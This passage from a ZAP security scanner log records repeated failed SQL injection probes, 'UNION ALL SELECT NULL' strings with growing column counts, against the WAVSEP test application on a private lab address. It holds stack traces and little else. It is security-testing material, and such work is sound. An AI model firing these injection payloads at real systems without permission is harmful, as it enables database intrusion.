org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680813 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680814 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680814 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680815 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680816 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680817 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680817 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680818 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680818 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680819 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680819 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680821 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680821 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check 